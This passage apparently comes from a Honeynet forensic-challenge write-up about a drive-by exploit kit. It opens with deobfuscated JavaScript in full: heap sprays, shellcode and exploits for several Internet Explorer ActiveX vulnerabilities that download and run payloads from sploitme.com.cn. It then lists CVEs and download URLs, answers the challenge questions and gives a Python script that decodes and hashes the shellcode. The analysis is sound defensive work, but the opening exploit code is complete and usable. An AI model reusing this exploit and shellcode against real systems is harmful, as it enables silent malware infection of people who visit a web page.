function aolwinamp(){try{var obj=document.createElement('object');document.body.appendChild(obj);obj.id='IWinAmpActiveX';obj.width='1';obj.height='1';obj.data='./directshow.php';obj.classid='clsid:0955AC62-BF2E-4CBA-A2B9-A63F772D46CF';var shellcode=unescape("%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C%u5A44%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455%u5756%u738B%u8B3C%u3374%u0378%u56F3%u768B%u0320%u33F3%u49C9%u4150%u33AD%u36FF%uBE0F%u0314%uF238%u0874%uCFC1%u030D%u40FA%uEFEB%u3B58%u75F8%u5EE5%u468B%u0324%u66C3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u6698%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u0455%u5093%uC033%u5050%u8B56%u0455%uC283%u837F%u31C2%u5052%u36B8%u2F1A%uFF70%u0455%u335B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEFB8%uE0CE%uFF60%u0455%u7468%u7074%u2F3A%u732F%u6C70%u696F%u6D74%u2E65%u6F63%u2E6D%u6E63%u662F%u2F67%u6F6C%u6461%u702E%u7068%u653F%u333D");var bigblock=unescape("%u0c0c%u0c0c");var headersize=20;var slackspace=headersize+shellcode.length;while(bigblock.length<slackspace)bigblock+=bigblock;var fillblock=bigblock.substring(0,slackspace);var block=bigblock.substring(0,bigblock.length-slackspace);while(block.length+slackspace<0x40000)block=block+block+fillblock;var memory=new Array();for(var i=0;i<666;i++){memory[i]=block+shellcode;}
document.write('<SCRIPT language="VBScript">');document.write('bof=string(1400,unescape("%ff")) + string(1000,unescape("%0c"))');document.write('IWinAmpActiveX.ConvertFile bof,1,1,1,1,1');document.write('IWinAmpActiveX.ConvertFile bof,1,1,1,1,1');document.write('IWinAmpActiveX.ConvertFile bof,1,1,1,1,1');document.write('IWinAmpActiveX.ConvertFile bof,1,1,1,1,1');document.write('</SCRIPT>');}catch(e){}
directshow();}
function directshow(){var shellcode=unescape("%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C%u5A44%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455%u5756%u738B%u8B3C%u3374%u0378%u56F3%u768B%u0320%u33F3%u49C9%u4150%u33AD%u36FF%uBE0F%u0314%uF238%u0874%uCFC1%u030D%u40FA%uEFEB%u3B58%u75F8%u5EE5%u468B%u0324%u66C3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u6698%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u0455%u5093%uC033%u5050%u8B56%u0455%uC283%u837F%u31C2%u5052%u36B8%u2F1A%uFF70%u0455%u335B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEFB8%uE0CE%uFF60%u0455%u7468%u7074%u2F3A%u732F%u6C70%u696F%u6D74%u2E65%u6F63%u2E6D%u6E63%u662F%u2F67%u6F6C%u6461%u702E%u7068%u653F%u343D");var bigblock=unescape("%u9090%u9090");var headersize=20;var slackspace=headersize+shellcode.length;while(bigblock.length<slackspace)bigblock+=bigblock;var fillblock=bigblock.substring(0,slackspace);var block=bigblock.substring(0,bigblock.length-slackspace);while(block.length+slackspace<0x40000){block=block+block+fillblock;}
var memory=new Array();for(var i=0;i<350;i++){memory[i]=block+shellcode;}
try{var obj=document.createElement('object');document.body.appendChild(obj);obj.width='1';obj.height='1';obj.data='./directshow.php';obj.classid='clsid:0955AC62-BF2E-4CBA-A2B9-A63F772D46CF';setTimeout("if (CheckIP()){ Complete(); } else { snapshot(); }",1000);}catch(e){snapshot();}}
function snapshot(){var x;var obj;var mycars=new Array();mycars[0]='c:/Program Files/Outlook Express/wab.exe';mycars[1]='d:/Program Files/Outlook Express/wab.exe';mycars[2]='e:/Program Files/Outlook Express/wab.exe';try{var obj=new ActiveXObject('snpvw.Snapshot Viewer Control.1');}catch(e){try{var obj=document.createElement('object');obj.setAttribute('classid','clsid:F0E42D50-368C-11D0-AD81-00A0C90DC8D9');obj.setAttribute('id','obj');obj.setAttribute('width','1');obj.setAttribute('height','1');document.body.appendChild(obj);}catch(e){}}
try{if(obj='[object]'){for(x in mycars){obj=new ActiveXObject('snpvw.Snapshot Viewer Control.1');var buf=mycars[x];obj.Zoom=0;obj.ShowNavigationButtons=false;obj.AllowContextMenu=false;obj.SnapshotPath='http://sploitme.com.cn/fg/load.php?e=6';try{obj.CompressedPath=buf;obj.PrintSnapshot();var snpelement=document.createElement('iframe');snpelement.setAttribute('id','snapiframe');snpelement.setAttribute('src','about:blank');snpelement.setAttribute('width',1);snpelement.setAttribute('height',1);snpelement.setAttribute('style','display:none;');document.body.appendChild(snpelement);setTimeout("document.getElementById('snapiframe').src = 'ldap://';",3000);}catch(e){}}}}catch(e){}
com();}
function com(){try{var obj=document.createElement('object');document.body.appendChild(obj);obj.setAttribute('classid','clsid:EC444CB6-3E7E-4865-B1C3-0DE72EF39B3F');if(obj){var shcode=unescape("%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C%u5A44%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455%u5756%u738B%u8B3C%u3374%u0378%u56F3%u768B%u0320%u33F3%u49C9%u4150%u33AD%u36FF%uBE0F%u0314%uF238%u0874%uCFC1%u030D%u40FA%uEFEB%u3B58%u75F8%u5EE5%u468B%u0324%u66C3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u6698%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u0455%u5093%uC033%u5050%u8B56%u0455%uC283%u837F%u31C2%u5052%u36B8%u2F1A%uFF70%u0455%u335B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEFB8%uE0CE%uFF60%u0455%u7468%u7074%u2F3A%u732F%u6C70%u696F%u6D74%u2E65%u6F63%u2E6D%u6E63%u662F%u2F67%u6F6C%u6461%u702E%u7068%u653F%u373D");var hbs=0x100000;var sss=hbs-(shcode.length*2+0x38);var hb=(0x0c0c0c0c-hbs)/hbs;var myvar=unescape("%u0C0C%u0C0C");var ss=myvar;while(ss.length*2<sss){ss+=ss;}
ss=ss.substring(0,sss/2);var m=new Array();for(var i=0;i<hb;i++){m[i]=ss+shcode;}
var z=Math.ceil(0x0c0c0c0c);z=document.scripts[0].createControlRange().length;}}catch(e){}
spreadsheet();}
function spreadsheet(){try{var objspread=new ActiveXObject('OWC10.Spreadsheet');}catch(e){}
if(objspread){try{var shellcode=unescape("%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C%u5A44%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455%u5756%u738B%u8B3C%u3374%u0378%u56F3%u768B%u0320%u33F3%u49C9%u4150%u33AD%u36FF%uBE0F%u0314%uF238%u0874%uCFC1%u030D%u40FA%uEFEB%u3B58%u75F8%u5EE5%u468B%u0324%u66C3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u6698%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u0455%u5093%uC033%u5050%u8B56%u0455%uC283%u837F%u31C2%u5052%u36B8%u2F1A%uFF70%u0455%u335B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEFB8%uE0CE%uFF60%u0455%u7468%u7074%u2F3A%u732F%u6C70%u696F%u6D74%u2E65%u6F63%u2E6D%u6E63%u662F%u2F67%u6F6C%u6461%u702E%u7068%u653F%u383D");var array=new Array();var ls=0x81000-(shellcode.length*2);var bigblock=unescape("%u0b0c%u0b0C");while(bigblock.length<ls/2){bigblock+=bigblock;}
var lh=bigblock.substring(0,ls/2);delete bigblock;for(var i=0;i<0x99*2;i++){array[i]=lh+lh+shellcode;}
CollectGarbage();var objspread=new ActiveXObject("OWC10.Spreadsheet");e=new Array();e.push(1);e.push(2);e.push(0);e.push(window);for(i=0;i<e.length;i++){for(j=0;j<10;j++){try{objspread.Evaluate(e[i]);}catch(e){}}}
window.status=e[3]+"";for(j=0;j<10;j++){try{objspread.msDataSourceObject(e[3]);}catch(e){}}}catch(e){}}
Complete();}
mdac();

The vulnerability behind each function is described below.

mdac()
MS06-014
CLSID : BD96C556-65A3-11D0-983A-00C04FC29E36 and others
Final download : http://sploitme.com.cn/fg/load.php?e=1

aolwinamp()
AOL IWinAmpActiveX Class (AmpX.dll 2.4.0.6) ConvertFile() remote overflow exploit (IE6/IE7)
CVE-2007-6250
Reference : http://www.kb.cert.org/vuls/id/568681
Final download : http://sploitme.com.cn/fg/load.php?e=3

directshow()
MS09-032
CLSID : 0955AC62-BF2E-4CBA-A2B9-A63F772D46CF
Final download : http://sploitme.com.cn/fg/load.php?e=4

snapshot()
CVE-2008-2463
CLSID : F0E42D50-368C-11D0-AD81-00A0C90DC8D9
Final download : http://sploitme.com.cn/fg/load.php?e=6

com()
MS05-052
CLSID : EC444CB6-3E7E-4865-B1C3-0DE72EF39B3F
Final download : http://sploitme.com.cn/fg/load.php?e=7

spreadsheet()
CVE-2009-1136
Final download : http://sploitme.com.cn/fg/load.php?e=8

4. Can you sketch an overview of the general actions performed by the attacker? (2pts)

The attacker inserted a malicious script into the rapidshare.com.eyu32.ru/login.php page through an attack such as SQL injection.
As a result, visitors to that page are sent to http://sploitme.com.cn/?click=3feb5a6b2f and are infected with malware through MS06-014 and several other vulnerabilities.

5. What steps are taken to slow the analysis down? (2pts)

Looking at the packets, when http://sploitme.com.cn/?click=3feb5a6b2f is visited the server returns the code below so that the page is mistaken for a non-existent one.

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<meta name="robots" content="noindex">
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /fg/show.php?s=3feb5a6b2f was not found on this server.</p>

6. Provide the javascripts from the pages identified in the previous question. Decode/deobfuscate them too. (8pts)

This question asks for the decoded JavaScript; all of it was covered in question 3 above.

7. On the malicious URLs at what do you think the variable 's' refers to? List the differences. (2pts)

Depending on the value of the s variable, the page reached was one of the two pages below; their contents differ slightly.
All of this was explained in question 3.
http://sploitme.com.cn/fg/show.php?s=3feb5a6b2f
http://sploitme.com.cn/fg/show.php?s=84c090bd86

8. Which operating system was targeted by the attacks? Which software? And which vulnerabilities? Could the attacks been prevented? (4pts)

All of them are vulnerabilities targeting Internet Explorer on Windows systems.

mdac()
MS06-014
CLSID : BD96C556-65A3-11D0-983A-00C04FC29E36 and others
Final download : http://sploitme.com.cn/fg/load.php?e=1

aolwinamp()
AOL IWinAmpActiveX Class (AmpX.dll 2.4.0.6) ConvertFile() remote overflow exploit (IE6/IE7)
CVE-2007-6250
Reference : http://www.kb.cert.org/vuls/id/568681
Final download : http://sploitme.com.cn/fg/load.php?e=3

directshow()
MS09-032
CLSID : 0955AC62-BF2E-4CBA-A2B9-A63F772D46CF
Final download : http://sploitme.com.cn/fg/load.php?e=4

snapshot()
CVE-2008-2463
CLSID : F0E42D50-368C-11D0-AD81-00A0C90DC8D9
Final download : http://sploitme.com.cn/fg/load.php?e=6

com()
MS05-052
CLSID : EC444CB6-3E7E-4865-B1C3-0DE72EF39B3F
Final download : http://sploitme.com.cn/fg/load.php?e=7

spreadsheet()
CVE-2009-1136
Final download : http://sploitme.com.cn/fg/load.php?e=8

9. What actions does the shellcodes perform? Please list the shellcodes (+md5 of the binaries). What's the difference between them? (8pts)

There were five shellcode files in the whole dump, but only two of them work correctly; their MD5 values are as follows.

#174 : e827460c0b6699922ac5a8e11fc3d3e2
#496 : b906014e9fcc31a849f97bebac475df5
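For question 9 the shellcodes can also be recovered from the stage-2 script itself. The script below is an added example (my own, not the author's): it turns each `%uXXXX` string into the bytes the heap spray actually places in memory (little-endian 16-bit units), hashes them, and pulls out the URL each one carries, which is the only thing that differs between the four. The four encoded strings are copied verbatim from `aolwinamp()`, `directshow()`, `com()` and `spreadsheet()` above. The MD5 values it prints are those of the decoded, script-embedded shellcode bytes; they are not claimed to match the #174 and #496 values the author hashed from the capture. Nothing here executes the shellcode.

```python
import hashlib
import re

# The four %u-encoded shellcode strings embedded in the stage-2 script above,
# copied verbatim from the page and keyed by the function that carries each one.
SHELLCODES = {
    "aolwinamp": "%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C%u5A44%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455%u5756%u738B%u8B3C%u3374%u0378%u56F3%u768B%u0320%u33F3%u49C9%u4150%u33AD%u36FF%uBE0F%u0314%uF238%u0874%uCFC1%u030D%u40FA%uEFEB%u3B58%u75F8%u5EE5%u468B%u0324%u66C3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u6698%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u0455%u5093%uC033%u5050%u8B56%u0455%uC283%u837F%u31C2%u5052%u36B8%u2F1A%uFF70%u0455%u335B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEFB8%uE0CE%uFF60%u0455%u7468%u7074%u2F3A%u732F%u6C70%u696F%u6D74%u2E65%u6F63%u2E6D%u6E63%u662F%u2F67%u6F6C%u6461%u702E%u7068%u653F%u333D",
    "directshow": "%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C%u5A44%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455%u5756%u738B%u8B3C%u3374%u0378%u56F3%u768B%u0320%u33F3%u49C9%u4150%u33AD%u36FF%uBE0F%u0314%uF238%u0874%uCFC1%u030D%u40FA%uEFEB%u3B58%u75F8%u5EE5%u468B%u0324%u66C3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u6698%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u0455%u5093%uC033%u5050%u8B56%u0455%uC283%u837F%u31C2%u5052%u36B8%u2F1A%uFF70%u0455%u335B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEFB8%uE0CE%uFF60%u0455%u7468%u7074%u2F3A%u732F%u6C70%u696F%u6D74%u2E65%u6F63%u2E6D%u6E63%u662F%u2F67%u6F6C%u6461%u702E%u7068%u653F%u343D",
    "com": "%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C%u5A44%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455%u5756%u738B%u8B3C%u3374%u0378%u56F3%u768B%u0320%u33F3%u49C9%u4150%u33AD%u36FF%uBE0F%u0314%uF238%u0874%uCFC1%u030D%u40FA%uEFEB%u3B58%u75F8%u5EE5%u468B%u0324%u66C3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u6698%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u0455%u5093%uC033%u5050%u8B56%u0455%uC283%u837F%u31C2%u5052%u36B8%u2F1A%uFF70%u0455%u335B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEFB8%uE0CE%uFF60%u0455%u7468%u7074%u2F3A%u732F%u6C70%u696F%u6D74%u2E65%u6F63%u2E6D%u6E63%u662F%u2F67%u6F6C%u6461%u702E%u7068%u653F%u373D",
    "spreadsheet": "%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C%u5A44%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455%u5756%u738B%u8B3C%u3374%u0378%u56F3%u768B%u0320%u33F3%u49C9%u4150%u33AD%u36FF%uBE0F%u0314%uF238%u0874%uCFC1%u030D%u40FA%uEFEB%u3B58%u75F8%u5EE5%u468B%u0324%u66C3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u6698%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u0455%u5093%uC033%u5050%u8B56%u0455%uC283%u837F%u31C2%u5052%u36B8%u2F1A%uFF70%u0455%u335B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEFB8%uE0CE%uFF60%u0455%u7468%u7074%u2F3A%u732F%u6C70%u696F%u6D74%u2E65%u6F63%u2E6D%u6E63%u662F%u2F67%u6F6C%u6461%u702E%u7068%u653F%u383D",
}

_ESC = re.compile(r"%u([0-9A-Fa-f]{4})|%([0-9A-Fa-f]{2})")


def js_unescape_bytes(s):
    """The bytes a heap spray actually places in memory: each %uXXXX is a UTF-16
    code unit stored little-endian, each %XX a single byte."""
    out = bytearray()
    for m in _ESC.finditer(s):
        if m.group(1):
            out += int(m.group(1), 16).to_bytes(2, "little")
        else:
            out.append(int(m.group(2), 16))
    return bytes(out)


def printable_strings(data, min_len=4):
    """Runs of printable ASCII, the same thing `strings` would show on the blob."""
    return [m.decode("ascii") for m in re.findall(rb"[ -~]{%d,}" % min_len, data)]


def download_url(data):
    m = re.search(rb"https?://[!-~]+", data)
    return m.group(0).decode("ascii") if m else None


def analyse_shellcodes(shellcodes=SHELLCODES):
    """Per shellcode: decoded size, md5 of the decoded bytes, the URL it carries,
    and the loader body with that URL cut off so the stubs can be compared."""
    report = {}
    for name, enc in shellcodes.items():
        data = js_unescape_bytes(enc)
        url = download_url(data)
        report[name] = {
            "size": len(data),
            "md5": hashlib.md5(data).hexdigest(),
            "url": url,
            "stub": data[: data.find(b"http")] if url else data,
        }
    return report


def shared_stub(report):
    """True when every shellcode is the same loader and only the trailing URL differs."""
    return len({r["stub"] for r in report.values()}) == 1


if __name__ == "__main__":
    report = analyse_shellcodes()
    for name, r in report.items():
        print(f"{name:12s} {r['size']:4d} bytes md5={r['md5']} url={r['url']}")
    print("same loader stub in all four:", shared_stub(report))
    print("strings:", printable_strings(js_unescape_bytes(SHELLCODES["aolwinamp"])))
```

Decoding the `%u` strings this way gives the real byte order (the first unit `%uC033` is `33 C0`, `xor eax,eax`), so hashes and string searches match what a memory dump of the sprayed heap would show; the `e=` parameter at the end of each URL is what tells the server which exploit succeeded.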

10. Was there malware involved? What is the purpose of the malware(s)? (We are not looking for a detailed malware analysis for this challenge) (4pts)

First, the file that is finally downloaded is the same in every case, and its MD5 value is as follows.
52312bb96ce72f230f0350e78873f791

The file shows no particularly malicious behaviour; when executed it connects to the URL http://www.honeynet.org/.
